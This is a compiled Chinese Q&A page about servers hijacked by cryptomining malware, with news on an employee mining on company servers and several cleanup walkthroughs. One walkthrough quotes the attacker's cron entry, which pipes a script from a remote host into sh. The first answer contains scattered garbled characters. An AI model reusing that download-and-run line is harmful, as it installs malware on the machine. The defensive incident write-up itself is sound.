伺服器被安裝挖礦
❶ 新買的雲伺服器提示挖礦
利用雲電腦的計算資源執行挖礦的持續性程序,
已停止是服務絕大數都是正常的。這些已停止表示你已經禁用或停止了相關的服務,但停止不是卸載,所以它們仍然存在是正常的,每台電腦里都有許多已停止的差念服務,不用擔心。你真正要擔心的是360那個提示,可在任務管理器中查著虛兄困活動進程,若某進程CPU或內存佔用高,而你又不明確該進程是塵肢幹嘛的,可以先結束進程再看看360還會不會提醒!
❷ 蔚來員工利用公司伺服器挖礦,這一行為是否違法
蔚來員工利用職務之便,從2021年2月開始使用公司伺服器進行挖礦,從中獲取利益,這個行為明顯已經觸犯了我國的相關法律。
其實利用公司資源進行非法挖礦行為早有先例,在2018年1月到5月期間,網路一個運維員工就曾經在網路公司伺服器上安裝挖礦程序,通過公司的資源謀取暴利,之後將挖礦所得的虛擬貨幣賣出,從中獲得10萬元人民幣,後來,在網路公司的追查下,這名員工才被發現,並且因涉嫌非法控制計算機信息系統罪被判有期徒刑三年,並處罰金1.1萬元,扣押違法所得10萬元整。
而對於挖礦這個行為,國家是堅決打擊的,目前相關的省份也出台了相關的文件,表面上只是提高了挖礦公司的電費,實際上是為了讓從事挖礦的人員知難而退,因為電費一旦上漲,那麼相對應的挖礦成本也就增加了。
綜上所述,該蔚來員工利用職務之便進行挖礦行為,已經涉嫌非法控制計算機信息系統罪,所以,他極有可能會因為此罪名而被起訴。
❸ windows伺服器的挖礦進程怎麼關閉刪除
這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後,使用裡面的病毒查殺功能,直接就可以查殺這種電腦病毒了
❹ 伺服器被rshim挖礦病毒攻擊後 HugePages_Total 透明大頁怎麼都清不掉 一直佔用內存 球球
問題定位及解決步驟:
1、free -m 查看內存使用狀態 ,發現free基本沒了。--> 懷疑是服務有內存泄漏,開始排查
2、使用top命令觀察,開啟的服務佔用內存量並不大,且最終文檔在一個值,且服務為java應用,內存並沒達到父jvm設置上限。按top監控佔用內存排序,加起來也不會超過物理內存總量。查看硬碟使用量,佔用20%。基本排除虛擬內存佔用過大的原因。--->排除服務內存泄漏因素,懷疑mysql和nginx,開始排查
3、因為top命令看 mysql佔用內存也再可控范圍,是否存在connection佔用過多內存,發現並不會,設置最大連接數為1000,最多也不會超過幾M。 nginx佔用一直非常小。但每次最先被kill的基本都是nginx進程。所以排查,但發現無非就是openfiles數量啥的調整。發現也一切正常。且之前niginx可以正常使用的。
4、最為費解的就是 通過free -m 查看的時候 基本全是used,cache部分很少,free基本沒有。但top上又找不到有哪些進程佔用了內存。無解
5、注意到有兩個進程雖佔用內存不多,但基本耗光了100%的cpu。開始想著佔cpu就佔了,沒占內存,現在是內存不不夠導致進程被kill的,就沒注意這點。
6、實在搞不定,重啟伺服器,重啟了所有服務,服務暫時可用,回家。在路上的時候發現又崩了。忐忑的睡覺。
7、早上起來繼續看,這次留意注意了下那兩個佔用高cpu的進程,kdevtmpfsi 和 networkservice。本著看看是啥進程的心態,網路了下。真相一目瞭然,兩個挖礦病毒。
突然後知後覺的意識到錯誤原因:
1、cpu佔用率高,正常服務使用cpu頻率較高的服務最容易最內存超標。(因為在需要使用cpu時沒cpu資源,內存大量佔用,服務瞬間崩潰),然後看top發現剛剛已經佔用內存的進程已經被kill了,所以沒發現內存有高佔用的情況。
2、後面的應用繼續使用cpu時也會發生類似情況,倒是服務一個一個逐漸被kill。
問題點基本定位好了,解決問題就相對簡單很多:
通過網路,google,常見的病毒清除步驟基本都能解決。這兩個挖礦病毒很常見,大致記錄下要點。可能所有病毒都會有這些基礎操作。
① 首先,查看當前系統中的定時任務:crontab -l
我伺服器上有四個定時下載任務 通過wget 和 curl 下載病毒文件,把異常的刪掉。要不然刪了病毒文件還是會下載下來
crontab -r,全部刪除命令(或根據需求刪除定時任務)
② 查找病毒文件 可以全部模糊搜索 清除, 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 後再使用rm -f filename 。可刪除
③ kill 病毒進程,但注意kill了可能馬上就重啟了。因為有守護進程,需要把病毒進程的守護進程也kill掉
④ 檢查是否root用戶被攻擊,可能系統配置信息被更改。
⑤ 最好能理解病毒腳本,通過看代碼看它做了些什麼。針對腳本取修復系統。
❺ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
❻ 伺服器集群感染了挖礦木馬該怎麼辦
企業電腦可以去騰訊安全申請個騰訊御點
然後使用這個軟體選擇左側的病毒查殺
用來對伺服器裡面的木馬病毒進行查殺了檢測就行
❼ 蔚來的員工被曝利用伺服器挖礦,這是否會影響到蔚來的經營
蔚來汽車為何又被曝出不良事件?
員工被曝光出利用公司的電腦挖礦,這會對公司產生不良的影響。
既然此件事情已經報告出來,蔚來公司一定會寄出一個合理的答復。我們也希望這個回復可以越快越好,畢竟作為一個國內知名的新能源汽車品牌,他們已經在公眾的心目當中有了一個公信度,在如此關鍵的成長階段出現這么不好的負面新聞,稍微處理不善就有可能將其品牌的公信度大大減少,並且影響到今後的新品汽車發售以及銷售問題。也希望官方能夠注意到這件事情的嚴重性,從公司的內部進行一次徹徹底底的大審查,爭取杜絕今後再在企業內部發生這樣的事情。
❽ 伺服器被攻擊並植入kdevtmpfsi挖礦/病毒/木馬
MongoDB庫中的數據莫名其妙沒有了,發覺如下信息:
1、 top -d 5命令 ,查看系統負載情況、是否有未知進程,發現一個名為kdevtmpfsi的進程,經科普它是一個挖礦程序,會佔用伺服器高額的CPU、內存資源。如圖,CPU佔用率高達788.7%,而且是yarn用戶下:
2、 ps -ef |grep kdevtmpfsi 命令查看 該挖礦程序路徑:/tmp/kdevtmpfsi
3、 ps -ef |grep yarn 命令查看更多關於yarn相關進程信息(此時我的伺服器並沒有開啟yarn服務,如果有yarn的相關進程則可判斷是攻擊者開啟的進程),發現另外還有個kinsing進程,經科普kinsing進程是kdevtmpfsi的守護進程:
4、 netstat -lntupaa 命令查看是否有異常的ip,果然發現194.87.102.77這個陌生的ip,判斷是kdevtmpfsi的發出者:
5、經查詢該ip的所在國家是俄羅斯:
6、 find / -iname kdevtmpfsi 命令再次確定命令所在位置以便刪除:
7、 cd /tmp 進入相關目錄:
8、 rm -rf kdevtmpfsi 刪除kdevtmpfsi程序:
9、** kill -9 40422**殺掉kdevtmpfsi進程:
10、發現並沒殺掉所有kdevtmpfsi進程,再次查找yarn的相關進程(因為之前已確認病毒是在yarn下),果真還有kdevtmpfsi進程存在:
11、用命令 批量殺掉 相關進程:
12、刪除kinsing文件:
13、現在,已經把挖礦程序及相關進程刪除掉了,但是還有兩處沒做處理:
14、 crontab -l 命令先看看crontab的定時任務列表吧:
15、編寫刪除挖礦程序腳本 kill_kdevtmpfsi.sh :
16、新增 定時任務 並刪除攻擊者的挖礦定時任務:
17、 crontab -l命令 查看現在只有殺進程的定時任務了:
18、禁止黑客的IP地址。
最初安裝MongoDB時,並未設置密碼認證,存在漏洞,導致黑客通過漏洞攻擊伺服器,並在程序里植入木馬/病毒。單純的kill -9 id殺掉病毒進程是殺不徹底的,治標不治本,應該定時刪除病毒進程,禁止攻擊者IP,重新安裝系統或相關軟體。
經過幾天的觀察,伺服器運行正常,再沒有被黑客攻擊成功。
❾ 伺服器被檢測出挖礦
有位朋友說,他伺服器使用的好好的,服務商突然封了他伺服器,說是被檢測出挖礦,這位朋友一臉懵「我開游戲的,挖什麼礦」。突然地關停伺服器導致這位朋友損失慘重,那麼為什麼會被檢測出挖礦,以及怎麼處理呢?感興趣的話就繼續往下看吧~
遇到以上問題,需要先找伺服器商對其說明實際情況,配合他們排查,基本上就是中了挖礦病毒。
最簡單的方法就是重裝系統,但是系統盤數據都會清空,這種辦法適用於伺服器里沒什麼需要備份的文件。如果選擇重裝系統,需要把自己的文件掃毒一遍確認安全後再導入伺服器。
但是伺服器里如果有很多重要的文件還有比較難配置的環境,那就需要排查刪除挖礦程序,全盤掃毒,刪除可疑文件,一個個修復病毒對系統的修改。
防範建議:
1.盡量不要使用默認密碼和埠,改一個比較復雜的密碼
2.可以使用寶塔面板登陸伺服器
3.系統自帶的防火牆、安全防護都不要關閉